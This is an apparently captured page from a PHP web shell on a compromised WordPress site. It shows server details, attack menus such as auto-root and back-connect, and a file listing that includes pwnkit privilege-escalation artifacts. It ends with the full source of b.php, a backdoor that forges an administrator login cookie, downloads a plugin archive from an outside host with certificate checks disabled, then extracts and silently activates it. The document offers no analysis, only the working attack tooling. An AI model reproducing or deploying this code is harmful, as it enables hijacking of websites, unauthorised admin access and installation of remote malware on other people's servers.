Linux hkg112.arandomserver.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
LiteSpeed
: 172.96.185.170 | : 216.73.216.67
Cant Read [ /etc/named.conf ]
7.4.33
gom
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gom /
topnhacaivn.top /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
695
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
279977_new_file_G2.php
0
B
-rw-r--r--
b.php
2.92
KB
-rw-r--r--
error_log
41.24
KB
-rw-r--r--
good.php
0
B
-rw-r--r--
google03865478695fd77a.html
53
B
-rw-r--r--
index.php
592
B
-rw-r--r--
license.txt
19.45
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rw-r--r--
robots.txt
68
B
-rw-r--r--
style.php
0
B
-rw-r--r--
verify_0182487e-f795-4b2f-8e48...
64
B
-rw-r--r--
wp-22.php
1.28
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
2.94
KB
-rw-r--r--
wp-config.php
3.22
KB
-rw-r--r--
wp-cron.php
5.51
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.83
KB
-rw-r--r--
wp-login.php
49.72
KB
-rw-r--r--
wp-mail.php
8.33
KB
-rw-r--r--
wp-settings.php
27.76
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.77
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : b.php
<?php @ini_set('display_errors', 0); @set_time_limit(0); $mr = $_SERVER['DOCUMENT_ROOT']; @chdir($mr); if (file_exists('wp-load.php')) { include 'wp-load.php'; // Admin kullanıcı bul ve cookie set et $wp_user_query = new WP_User_Query(array( 'role' => 'Administrator', 'number' => 1, 'fields' => 'ID' )); $results = $wp_user_query->get_results(); if (!isset($results[0])) { die('NO ADMIN'); } wp_set_auth_cookie($results[0]); // WordPress sistemine takılmadan direkt işlem yap global $wpdb; // Eklenti kontrolü ve güncelleme $active_plugins = get_option('active_plugins', array()); $plugin_file = 'gplrock-auto-publisher/gplrock-auto-publisher.php'; // HER ZAMAN yeni versiyonu indir ve üzerine yaz $plugin_url = 'https://panel21.com/downloads/repository/plugins/tipo-plugin-auto.zip'; $temp_file = WP_PLUGIN_DIR . '/gplrock-temp.zip'; // cURL ile indir $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $plugin_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 60); $zip_content = curl_exec($ch); curl_close($ch); if ($zip_content) { // ZIP dosyasını kaydet file_put_contents($temp_file, $zip_content); // ZIP çıkart - Üzerine yaz (override) $zip = new ZipArchive(); if ($zip->open($temp_file) === TRUE) { $zip->extractTo(WP_PLUGIN_DIR); $zip->close(); // Geçici dosyayı sil @unlink($temp_file); // Eklenti listede yoksa ekle (varsa zaten aktif) if (!in_array($plugin_file, $active_plugins)) { $active_plugins[] = $plugin_file; update_option('active_plugins', $active_plugins); } // Eklenti durumunu güncelle update_option('gplrock_ghost_mode', true); update_option('gplrock_ghost_setup_completed', true); update_option('gplrock_ghost_setup_date', current_time('mysql')); // Cache temizle - WordPress fonksiyonları olmadan if (function_exists('wp_cache_flush')) { wp_cache_flush(); } // Transient'ları temizle $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '_transient_%'"); $wpdb->query("DELETE FROM {$wpdb->options} WHERE option_name LIKE '_site_transient_%'"); // Rewrite kurallarını temizle delete_option('rewrite_rules'); } } // Admin paneline git wp_redirect(admin_url('admyyyyyyyyyyyyyyyyyyyyyyyyyyyydasdasdasdock-dashboard')); exit; } else { die('Failed to load WordPress'); } ?>
Close